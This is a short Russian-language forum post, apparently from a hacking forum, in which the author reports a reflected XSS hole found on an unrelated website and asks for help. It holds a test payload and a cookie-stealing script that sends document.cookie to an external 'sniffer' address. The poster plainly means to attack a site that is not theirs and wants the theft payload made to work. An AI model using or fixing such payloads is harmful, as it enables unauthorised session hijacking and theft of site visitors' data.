Вобщем проблемма такая) Нашел уязвимость на рандомном сайте
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
alert('') выполняется при вводе
code:
'>">alert(/XSS/)
в строку поиска или в адресную строку.
Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..
Сообственно тело скрипта
code:
">
img = new Image(); img.src = "Адресс снифа"+document.cookie;
Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)
p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..